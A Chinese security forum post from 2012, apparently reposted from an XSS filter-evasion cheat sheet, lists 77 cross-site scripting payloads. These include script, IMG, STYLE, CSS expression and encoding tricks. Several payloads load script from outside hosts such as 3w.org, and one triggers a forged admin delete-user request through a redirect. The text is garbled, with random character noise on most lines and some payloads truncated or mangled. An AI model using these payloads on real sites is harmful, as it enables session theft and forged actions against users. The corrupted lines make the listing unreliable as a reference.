貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
! ~- U! E. I& _' W X( i1 b! e1 R) K" [
(1)普通的XSS JavaScript注入. r: M% z+ M' M) d! g v
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& I* [" K1 N7 e
, ]# n; l4 s: L p/ q
(2)IMG标签XSS使用JavaScript命令
- Q# E6 P0 `. j. R <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 M [& Z' [/ V0 @
6 u" }: P/ f' j" G+ }* M (3)IMG标签无分号无引号; c3 [. B+ Z2 _$ m: _
<IMG SRC=javascript:alert(‘XSS’)>) @. `5 k3 y% C2 I, o x
3 A8 e, B d" k0 ~4 Y: d* ?8 N (4)IMG标签大小写不敏感; m, |0 w0 i! ?4 J3 \/ u
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 B6 f$ S. m; j I" k# m0 _; C1 R1 h2 B. P' z9 R, `% F3 Z1 w
(5)HTML编码(必须有分号)
5 ?+ P u7 c7 E <IMG SRC=javascript:alert(“XSS”)>
; m r" j1 e/ x$ |" m4 ]: t
. {7 X5 o% E8 d (6)修正缺陷IMG标签' n! y- B! }1 Z7 m, z# B0 E
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- N( s0 r8 L/ g% {) g2 L( O8 I
(7)formCharCode标签(计算器): ^: t; Y4 w2 w! \8 ?
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>1 K$ F% O( [0 I
+ o5 H8 S7 H( L
(8)UTF-8的Unicode编码(计算器)0 T7 |! K7 T1 M/ D2 U% m
<IMG SRC=jav..省略..S')>
1 d+ h# g) O2 C0 n. y& m# @* l8 K. r f9 l. v! y0 f
(9)7位的UTF-8的Unicode编码是没有分号的(计算器); q+ O5 T. z4 @% J! [/ r
<IMG SRC=jav..省略..S')>7 F8 L* t T$ x) f
, v' A) s+ O* [9 [% `9 t! K1 v (10)十六进制编码也是没有分号(计算器)
6 T; d' P0 D& ]( o( r- @ <IMG SRC=java..省略..XSS')>
0 a m+ L* ]! p1 S* U* n& g+ F" S. {; G/ M2 w' ?0 Q
(11)嵌入式标签,将Javascript分开$ W& ?7 W1 \- ^* @/ X r0 ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( {+ z( n. t; N# ]& Q: @$ U# N: E" ]+ g4 X# L5 I) n! W( p
(12)嵌入式编码标签,将Javascript分开- U) B$ p9 D. ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>
) N5 u: J7 Q6 N/ W+ ?
8 S3 l: d1 J. m& e" J! [/ ]* I (13)嵌入式换行符' Q+ w" c/ E6 L# C/ y
<IMG SRC=”jav ascript:alert(‘XSS’);”>8 V1 ?, T! T: |2 z7 ~7 w
+ N5 p; z" O% D (14)嵌入式回车
! ~! B' ?5 y# @+ J8 { <IMG SRC=”jav ascript:alert(‘XSS’);”>+ {) Q, S% L6 w0 K. P' [3 z& \! X
! S% [, ~, ~+ F6 z4 }; [7 [, g (15)嵌入式多行注入JavaScript,这是XSS极端的例子& z! g1 y: n' \" W! p$ s; @# x
<IMG SRC=”javascript:alert(‘XSS‘)”>/ l* M9 y. `' N3 H6 s4 _) X7 i
& F6 t2 x5 y3 V$ \ (16)解决限制字符(要求同页面)) a: j: K: O- F. K4 Z/ q6 F. E
<script>z=’document.’</script>% i( W* t# O& P- ]; v' y
<script>z=z+’write(“‘</script>
3 y7 r! Z- P0 i g& v2 g+ S <script>z=z+’<script’</script>
- P& h$ E; d- l0 U <script>z=z+’ src=ht’</script>
i! M1 ]! ]& y; ~ <script>z=z+’tp://ww’</script>! N4 ~+ _; w3 f3 y" m o
<script>z=z+’w.shell’</script>; |3 T3 J' H* r: e6 d r: `$ }
<script>z=z+’.net/1.’</script>& ` c L' l1 u8 r$ |7 F
<script>z=z+’js></sc’</script>+ {4 K, o5 L1 m
<script>z=z+’ript>”)’</script>" `9 q2 v! \1 a; d0 C6 \( {
<script>eval_r(z)</script>
$ Y, |7 q2 ~" y; T5 i! N
/ I: w' F4 j t! |" e* J+ y2 _0 Z (17)空字符
. A+ \ Q* Z% M8 A( F9 Q perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 T+ O* R9 k6 o. Z+ ?
9 Y4 C) ` B2 Q! Y3 T (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' t: }9 Y: ]+ W7 n3 n0 H7 s
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out5 T+ b8 g4 t8 h/ X9 W
; G. p$ H2 s, x8 c5 F/ B, u (19)Spaces和meta前的IMG标签
# x" y1 L) J5 x/ U G: x <IMG SRC=” � javascript:alert(‘XSS’);”> g! D1 Q2 @2 I8 _
& C& q; L6 P9 ^9 j# G
(20)Non-alpha-non-digit XSS5 q! y8 k, l- {: B. _! }0 q
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ V" U4 u- T1 ^2 e* e V5 S7 Q
`: e1 I: T+ n8 i |$ V# J/ d1 C
(21)Non-alpha-non-digit XSS to 2- O# Q" V2 f }- @/ l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) t5 e% V% t" V( {( h
- d* u% h% F" W
(22)Non-alpha-non-digit XSS to 3+ S" u6 a* c+ D$ z3 K! ~9 h9 c
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 t& J/ N9 s t$ n
, y% n* t6 m* g' A6 U$ X/ ?) U6 P (23)双开括号: W! M. P9 |$ [, ~ t
<<SCRIPT>alert(“XSS”);//<</SCRIPT>; y R# A1 c5 f9 b' A
/ ^1 A- ~8 X; ~! X
(24)无结束脚本标记(仅火狐等浏览器)
7 l; y% c9 T. v" D& q6 O) [ <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
1 E Y, u: }; f+ S- M* i$ z! e' j" v# \% j+ C, N% E4 Z
(25)无结束脚本标记2- E4 a5 Z, a0 m- Q: l% |' p
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 R# Q, m& V5 T% |6 M+ v& P/ _7 H: G% }: W( s$ k" q9 o, x" Z/ {- S: _
(26)半开的HTML/JavaScript XSS
, {* r/ C$ ^' W! R8 y& q; G# [$ t <IMG SRC=”javascript:alert(‘XSS’)”
- F2 D; b: M$ i8 `
6 ?, @( u) U- o4 F (27)双开角括号
8 M7 g: P6 M( g" t) e& y6 t <iframe src=http://3w.org/XSS.html <
8 {: L6 }$ g: p* n* k0 W7 Q) z* y4 } @$ D/ h; ?
(28)无单引号 双引号 分号, i7 n( [. q5 a! o* [% r
<SCRIPT>a=/XSS/# `+ w8 t2 G+ Y0 O* V& k
alert(a.source)</SCRIPT>5 A/ b1 ?. ~+ m' j" p" y7 H
9 V7 H* W& @# r$ {$ D
(29)换码过滤的JavaScript( d5 ?1 T) ~8 {% O" g, D
\”;alert(‘XSS’);//
f {# Q4 ?% z# }1 n; D5 |: n" @3 _5 t7 M' e
(30)结束Title标签
; W5 N0 p4 u7 i" u, R8 O, m. Z </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; w) D. G5 z3 b' W; b+ K1 b
: N' q2 ]% C2 M; B& \+ M! k( l# k (31)Input Image8 F# i/ p: {! u
<INPUT SRC=”javascript:alert(‘XSS’);”>3 \9 G! q) P3 T I( |" ?; v
) p# r$ W2 l; R9 C7 X! _ V
(32)BODY Image j' y- O& ~) t
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>2 x0 H2 |) I- m k. n0 d' G4 Q
$ K1 j+ k2 d1 z4 Q8 e; k (33)BODY标签% X1 L4 \8 _. ?! m* P5 L
<BODY(‘XSS’)>
7 P7 D! O0 I" D8 q- {' h; O' B! k+ F8 K! G- [
(34)IMG Dynsrc4 e8 E* a! K3 ]) Q" D! d9 Y2 }6 v
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
- c+ n9 x' f( `+ @( e6 m5 Y
$ n+ }5 s. ?9 {0 ?% J2 e2 `, | (35)IMG Lowsrc
$ Y2 O/ D! R& i- @) ~ <IMG LOWSRC=”javascript:alert(‘XSS’)”>
( B3 X0 H) O1 v9 X) g1 _9 p# V p: R$ |7 `, ~/ I. T, J5 w$ j
(36)BGSOUND, }+ w1 o4 T: q5 _0 v3 _
<BGSOUND SRC=”javascript:alert(‘XSS’);”>. H' Z5 x; ?# _: O
, J' k& w) w; \* L2 v( z9 x6 v
(37)STYLE sheet
7 L# L8 F2 o1 J6 `4 x6 f! |+ w <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) u; ~8 C. u. z7 q! ?, y4 f9 B4 n( e. `
(38)远程样式表
4 l* c( k% u/ r <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>2 L: k9 s3 F+ t) I
- M! {; P( d) }. E4 z (39)List-style-image(列表式)
" k' A o3 q; O& m <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS# a& S) q, M$ Q: K" s/ A' r t
5 v1 N: z8 I3 G/ ` (40)IMG VBscript/ q! `0 m% [" n% N$ c
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! g! Y" x" ?9 ~1 T. c: C7 _/ i' H4 s3 N) [% _& `& d. P
(41)META链接url. T) R, p, ~4 r4 B) Q8 l
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& u1 b2 C) P) F( t0 ^! Y) Q
$ f& K3 L' o; ^4 Z8 k; z2 L (42)Iframe1 P2 p8 e4 f0 F0 F% O
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
6 C* U1 A, Z' V. U
7 W( G7 ?$ l! Z- m4 T (43)Frame9 W( y9 a5 Q- y' I [. D- E
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>. }4 L% i9 k& ] J* F: P7 \
" @. x. y+ t% L
(44)Table
, B' G8 ?+ R: V) U# K4 Z+ I <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
. X& r8 E; h- R
. R3 d/ {( a9 [ (45)TD
Z# W4 y8 X( d% B. l) \* { <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
, Z+ Z: ~$ c. f+ Y9 P3 k0 j# y' d) N1 }- Q
(46)DIV background-image" u5 V& K) ~3 K2 N# k" {9 R& k
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
4 e- `3 \) ?' l$ p3 ~. f
# Z- h9 r3 K$ n0 X2 Y# n (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 F" N5 H. O( r9 X9 n7 N6 m
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
9 W8 l4 u. ?3 p& s" e. O! }/ i, j" Q7 k
(48)DIV expression
" R4 ~3 Q% b: z8 z6 ?8 g$ h q <DIV STYLE=”width: expression_r(alert(‘XSS’));”>% k, c% ?' {8 b9 Z3 {
; i5 R2 Q* [. q: ~' X2 N# Z3 ~ (49)STYLE属性分拆表达
6 y/ X2 k8 ^1 A. `* }4 r& I4 V <IMG STYLE=”xss:expression_r(alert(‘XSS’))”> ^+ E6 o5 k# C1 l+ L
# {. ^# v9 ~/ y9 g, z (50)匿名STYLE(组成:开角号和一个字母开头)
7 d% l' b. [) b <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>! Q3 _( }* b% f1 N% I
- {7 g! P. g3 p2 e8 R
(51)STYLE background-image1 [6 d9 ? k W; p0 S3 Y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% e6 P- Q4 C& H3 H* P) _5 B/ I6 s: r8 o
(52)IMG STYLE方式1 H+ a4 T* u$ [
exppression(alert(“XSS”))’>
+ \2 N7 M7 D' K1 V2 ~& o- D5 S6 t$ {5 y9 t( @& Z$ s
(53)STYLE background
8 U7 A) N* F6 `# E4 p7 g <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ b+ x# E8 W5 T9 Y0 o
& A u. v9 M, _! y (54)BASE
" P. E- \; Q! i: F, m <BASE HREF=”javascript:alert(‘XSS’);//”>/ o9 o/ `/ \( `* t% L
" m, C/ p" @2 M8 q& ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
. E; z3 Y' c6 l8 N! { <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>$ F$ X+ E" H+ r1 D
& h7 d8 T* M* d- @6 b, S2 s (56)在flash中使用ActionScrpt可以混进你XSS的代码
( y9 m' V& U( f8 f' V a=”get”;$ Z. r, A8 E s" l% |
b=”URL(\”";
. j+ |0 z3 A4 l/ y( p) I s c=”javascript:”;
. i" o( q/ B9 t5 Z8 c d=”alert(‘XSS’);\”)”;
I6 `( a% b: r8 P3 V; s0 F eval_r(a+b+c+d);) |. Z9 S* n) F& }+ o
- i. A: D- U0 y4 ]1 Y
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' k8 e; Z; O# |: R6 x <HTML xmlns:xss>3 l, J+ L3 S/ s" G7 E
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
/ D! i1 v/ R- u- r <xss:xss>XSS</xss:xss>. u) i/ \7 _; _# i- ?, M2 L5 x
</HTML>
# q n' m3 t0 h; a! s) x7 n9 A
* g, t: p9 U8 p) D& A. { (58)如果过滤了你的JS你可以在图片里添加JS代码来利用) ] o k- ~1 D! v j& {
<SCRIPT SRC=””></SCRIPT>9 |5 j, D# I. S( H& @
# H+ q$ ?' L# R$ u6 Q" `) T (59)IMG嵌入式命令,可执行任意命令8 M5 g( {, q7 |; V
<IMG SRC=”http://www.XXX.com/a.php?a=b”>' }) V- k: B6 [
8 m5 R( w/ U" }4 M; q
(60)IMG嵌入式命令(a.jpg在同服务器)& Z6 x2 I. z3 n: m# g; Z+ P: b X
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
7 {( H' j0 X/ b+ [* z9 g
5 D. V3 z7 i5 t {0 q* U (61)绕符号过滤
$ d7 h" e& X7 D9 R <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>; _: j+ ^( r7 I) w8 j6 r
( _+ m& h. O% F5 d' i (62)
# L3 E7 v6 B4 n6 Z1 A) r; \ <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>" W: @% l- O6 S- j" ]! d( t0 m3 m
( Q5 Z% _& q+ d5 c+ z (63)0 Z: }9 R/ M! ~4 t6 }6 J% c" q% `
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- C: Z9 K+ i( \) J. i" C
9 k4 J) C$ \; ~6 R8 X
(64)8 z& k* ?: z/ W, h1 [. d0 W
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
! z5 q" Y9 [5 V
! i! f9 T0 r! [$ G5 e) |5 Z3 N (65)
3 X# e/ v! K7 f* m: ~* e `5 B <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
4 k( R0 [5 `0 e2 d2 P4 Y
8 d" d X% k& p1 ~& O; w7 e (66)
7 O! K' P) G8 E1 R <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
# q P' e$ k0 R/ K: \, ^* k; y1 L4 R+ c" C0 _5 M) t/ q
(67)5 y1 T$ t6 ]! ?
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>$ Z7 N( B- B1 A
6 t2 w% j }! @( S) g
(68)URL绕行
0 c; A1 Y4 u4 _+ l/ D <A HREF=”http://127.0.0.1/”>XSS</A>" v3 ?) u, \: m% ~! u& h
% U! A1 P5 U0 z D0 z4 [
(69)URL编码" S: ?% }! I9 j* v; I4 z
<A HREF=”http://3w.org”>XSS</A>
: M; c4 P6 D7 m0 f
' \* {, `+ g% y7 x (70)IP十进制0 M' E) u8 S0 O+ m* W0 J K7 g- V
<A HREF=”http://3232235521″>XSS</A>
: ?! o( L( @+ _! Q( q( F* G+ h# B" y- B& c J. j7 ?
(71)IP十六进制
5 D# k! T S! c! z <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
U3 r. s# R. b7 _7 W# P/ Z3 _1 G) ~# X* p5 K* r! m- X# e
(72)IP八进制
$ J2 Y1 i3 Q( | <A HREF=”http://0300.0250.0000.0001″>XSS</A>! q# m# a7 N5 }
7 `+ ~$ a: J) O. K (73)混合编码- u( E+ g: U% T
<A HREF=”h
- ?6 C1 Z1 B+ [5 P tt p://6 6.000146.0×7.147/”">XSS</A>
4 O9 o3 B' O" X5 ]/ J/ c* y: P" D+ n8 m; t% Y9 G
(74)节省[http:]/ A0 ]/ Z5 {5 I. U. K' g; D( Q
<A HREF=”//www.google.com/”>XSS</A>
) O0 X/ o' P& }# n" a7 n
/ x# x" o' e" X6 k6 i (75)节省[www]+ P7 [, K( Q7 Z+ X L d) B) b8 z
<A HREF=”http://google.com/”>XSS</A>3 D) t' k. G4 k% d" b6 t( A
# d4 v# q3 g A9 F7 }- S/ g9 ] (76)绝对点绝对DNS
1 b" N& L$ @- C& R! }$ ?! n <A HREF=”http://www.google.com./”>XSS</A>
5 T4 u) Z& ?' H+ P
9 C! B% \' C! s: X (77)javascript链接
0 R3 o7 g& y5 P6 e% u) D, K1 N <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对